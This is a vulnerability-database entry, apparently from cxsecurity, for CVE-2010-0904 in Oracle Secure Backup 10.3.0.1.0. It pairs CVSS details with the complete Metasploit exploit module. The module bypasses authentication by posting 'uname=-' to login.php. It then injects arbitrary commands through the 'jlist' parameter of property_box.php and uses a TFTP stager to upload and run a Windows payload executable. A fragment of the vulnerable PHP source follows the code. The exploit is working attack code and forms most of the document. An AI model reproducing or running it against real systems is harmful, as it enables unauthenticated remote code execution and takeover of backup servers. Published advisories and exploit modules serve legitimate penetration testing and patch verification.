Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability

2011-08-30 / 2011-08-31
Credit: metasploit
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2010-0904
CWE: NVD-CWE-noinfo


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

## # $Id: osb_uname_jlist.rb 13591 2011-08-19 18:35:29Z mc $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability', 'Description' => %q{ This module exploits an authentication bypass vulnerability in login.php. In conjuction with the authentication bypass issue, the 'jlist' parameter in property_box.php can be used to execute arbitrary system commands. This module was tested against Oracle Secure Backup version 10.3.0.1.0 }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 13591 $', 'References' => [ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ], [ 'CVE', '2010-0904' ], # the jlist vector has not been disclosed or has it? ], 'Targets' => [ [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ] ], 'Privileged' => 'true', 'Platform' => 'win', 'DisclosureDate' => 'Jul 13 2010', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ]) ], self.class) end def windows_stager exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe" print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}") execute_cmdstager({ :temp => '.'}) @payload_exe = payload_exe print_status("Attempting to execute the payload...") execute_command(@payload_exe) end def execute_command(cmd, opts = {}) res = send_request_cgi( { 'uri' => '/login.php', 'data' => 'attempt=1&uname=-', 'method' => 'POST', }, 5) if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i)) sessionid = res.headers['Set-Cookie'].split(';')[0] data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd) send_request_raw( { 'uri' => '/property_box.php' + data, 'cookie' => sessionid, 'method' => 'GET', }, 5) else print_error("Invalid PHPSESSION token..") return end end def exploit if not datastore['CMD'].empty? print_status("Executing command '#{datastore['CMD']}'") execute_command(datastore['CMD']) return end case target['Platform'] when 'win' windows_stager else raise RuntimeError, 'Target not supported.' end handler end end __END__ else if (strcmp($type, "Job") == 0) { if (!is_array($objectname)) $objectname = array(); reset($objectname); while (list(,$oname) = each($objectname)) { $oname = escapeshellarg($oname); $jlist = "$jlist $oname"; } if (strlen($jlist) > 0) $msg = exec_qr("$rbtool lsjob -lrRLC $jlist");

References:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top